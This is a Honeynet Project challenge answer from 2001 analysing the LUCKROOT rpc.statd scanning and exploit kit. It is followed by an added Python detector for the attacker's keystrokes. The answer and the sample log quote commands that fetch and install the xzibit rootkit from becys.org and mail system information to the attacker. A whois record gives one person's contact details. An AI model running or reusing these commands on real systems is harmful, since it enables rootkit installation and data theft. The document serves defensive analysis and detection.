From soul4blade@yahoo.com Sat Mar 17 19:44:12 2001
Date: Thu, 1 Mar 2001 04:21:47 -0800 (PST)
From: Bogdan Calin
To: project@honeynet.org
Subject: SCAN OF THE MONTH Answers

# SCAN OF THE MONTH #13: March, 2001
# Challenge to see who can determine which tool was used
# and the purpose of this attack.
# The packets were captured from the wild as part of the
# Honeynet Project, http://project.honeynet.org

In the past two months, the Honeynet Project has identified a great deal of aggressive activity from members of the Romanian blackhat community. On 5 Jan, 2001 a Linux honeypot was compromised by one of these members. On 8 Jan, 2001, the attacker's keystrokes were captured and forwarded to a secured syslog server. Your job is to analyze these keystrokes and the tool LUCKROOT.TAR. Based on your research, you should be prepared to answer the questions set forth by the challenge. You can download LUCKROOT.TAR from the URL below.

WARNING: you will be analyzing a toolkit captured in the wild; this tool set was created by the blackhat community for malicious purposes. Only use a system dedicated for such analysis. Do not run this toolset while connected to a network. You have been warned :)

http://project.honeynet.org/scans/scan13/LUCKROOT.TAR

QUESTIONS:
----------

### QUESTION 1: What is the blackhat attempting to do with his command line syntax?

First the blackhat uses lynx to download LUCKROOT.TAR from www.becys.org and extracts LUCKROOT.TAR (his toolkit) into the /usr/sbin/.mail directory. Next he uses the ./luckgo shell script to scan for, and possibly get root on, computers with a vulnerable rpc.statd. Various networks have been probed (216.210.x.x, 200.120.x.x, 64.120.x.x, ...).

Details on the rpc.statd vulnerability: http://www.securityfocus.com/vdb/bottom.html?section=discussion&vid=1480

### QUESTION 2: What does the tool accomplish?

It scans for and tries to exploit systems with a vulnerable rpc.statd.

### QUESTION 3: How does the tool work?
The tool contains the following files:

  luckstatdx.c  - modified rpc.statd exploit
  luckstatdx    - compiled version of the above file
  luckscan-a.c  - class A port scanner
  luckscan-a    - compiled version of the scanner
  luckgo        - main shell script

"luckgo" first compiles "luckstatdx.c" and "luckscan-a.c". Next it launches the scanner "luckscan-a" with the parameters provided on the command line. "luckscan-a" performs a port scan for port 111 (rpc) and launches the "luckstatdx" exploit against responsive systems. When a vulnerable system is found, the following commands are executed:

  cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz

Another toolkit is downloaded and installed (http://www.becys.org/xzibit.tar.gz). "xzibit.tar.gz" is a modified version of a well-known rootkit. It contains "stealth" replacements for various unix commands (ifconfig, top, ps, netstat, ...). This toolkit installs an ssh daemon on port 6969. The toolkit has been modified so it will send an email to becys@becys.org with the subject "becys rewting":

  cat /tmp/info | mail -s "becys rewting" becys@becys.org

### QUESTION 4: Is this tool a worm, or would you classify it as something else?

It is not a worm because it's not self-propagating; it's just an automatic tool.

### QUESTION 5: Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified?

It's based on the rpc.statd exploit from ron1n (http://www.securityfocus.com/data/vulnerabilities/exploits/statdx.c). "luckstatdx.c" is just a modified version of statdx.c. The install script from the xzibit.tar.gz rootkit has also been modified.

### QUESTION 6: Bonus Question: What information can you obtain about who is using or created the tool?

The people behind this tool: "BeCyS & ReSpEkT". Homepage: www.becys.org. They are from the Romanian community; the following comment (in luckstatdx.c) is in Romanian:

  // Aici cred ca trebuie un exit.

(Romanian for "Here I think an exit is needed.")

Information provided by whois (probably faked):

  whois -h whois.crsnic.net becys.org
  Redirecting to BULKREGISTER.COM, INC.

  bSoft
  1 Hensel Dr. Apt.#Z1F
  College Station, Texas 77840
  US

  Domain Name: BECYS.ORG

  Administrative Contact:
    Qian Wang  becys@yahoo.com
    bSoft
    1 Hensel Dr. Apt.#Z1F
    College Station, Texas 77840
    US
    Phone- (979)862-9233
    Fax-

  Technical Contact:
    Web Site Source, In  info@websitesource.com
    Web Site Source, Inc.
    2476 Bolsover, Suite 484
    Houston, TX 77005-2518
    US
    Phone- 713-667-2520
    Fax- 800-863-6499

  Record updated on 2000-09-11 00:00:00.
  Record created on 2000-09-11.
  Record expires on 2002-09-11.
  Database last updated on 2001-02-28 23:45:44 EST.

  Domain servers in listed order:
    NS.WEBSITESOURCE.COM   216.147.43.135
    NS2.WEBSITESOURCE.COM  216.147.1.116

----------------------------------------------------------------
Bogdan Calin (soul4blade@yahoo.com)
come.to/soul4blade
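Added example, not part of Bogdan Calin's submission or of the Honeynet Project's material: a small Python checker that runs over syslog-forwarded keystroke lines and flags the command sequence the answers above describe (the LUCKROOT.TAR fetch, the hidden /usr/sbin/.mail directory, the luckgo scan, the xzibit.tar.gz rootkit install and cleanup, and the notification mail), then maps the hits onto the stages of the intrusion. The log line format, the luckgo argument and the function names are assumptions, and the sample log is constructed.

```python
import re

# Indicators taken from the command lines quoted in the analysis above.
INDICATORS = [
    ("toolkit-download",   re.compile(r"lynx\b.*\bLUCKROOT\.TAR\b")),
    ("hidden-toolkit-dir", re.compile(r"/usr/sbin/\.mail\b")),
    ("scanner-launch",     re.compile(r"\./luckgo\b")),
    ("rootkit-fetch",      re.compile(r"wget\b.*becys\.org/xzibit\.tar\.gz")),
    ("rootkit-install",    re.compile(r"cd lamerk;\s*\./install\b")),
    ("cleanup",            re.compile(r"rm -rf\b.*\blamerk\b")),
    ("notify-mail",        re.compile(r'mail -s "becys rewting" becys@becys\.org')),
]

def scan_keystrokes(lines):
    """Return (line_number, label, line) for every indicator hit, in log order."""
    hits = []
    for n, line in enumerate(lines, start=1):
        for label, pattern in INDICATORS:
            if pattern.search(line):
                hits.append((n, label, line.rstrip()))
    return hits

def classify(hits):
    """Map indicator hits onto the stages of the intrusion described above."""
    labels = {label for _, label, _ in hits}
    stages = []
    if labels & {"toolkit-download", "hidden-toolkit-dir", "scanner-launch"}:
        stages.append("luckroot-staging")
    if labels & {"rootkit-fetch", "rootkit-install", "cleanup"}:
        stages.append("xzibit-rootkit-install")
    if "notify-mail" in labels:
        stages.append("attacker-notification")
    return stages

# Constructed sample: hypothetical syslog-forwarded keystroke lines, not the
# challenge's real capture (the luckgo argument format is assumed).
SAMPLE_LOG = """\
Jan  8 03:12:01 honeypot bash[1234]: lynx http://www.becys.org/LUCKROOT.TAR
Jan  8 03:12:30 honeypot bash[1234]: tar -xf LUCKROOT.TAR -C /usr/sbin/.mail
Jan  8 03:13:05 honeypot bash[1234]: ./luckgo 216.210
Jan  8 03:20:44 honeypot bash[1234]: ls -la
Jan  8 03:25:10 honeypot sh[2345]: cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz
Jan  8 03:26:00 honeypot sh[2345]: cat /tmp/info | mail -s "becys rewting" becys@becys.org
"""

if __name__ == "__main__":
    found = scan_keystrokes(SAMPLE_LOG.splitlines())
    for n, label, line in found:
        print(f"line {n}: {label}")
    print("stages:", classify(found))
```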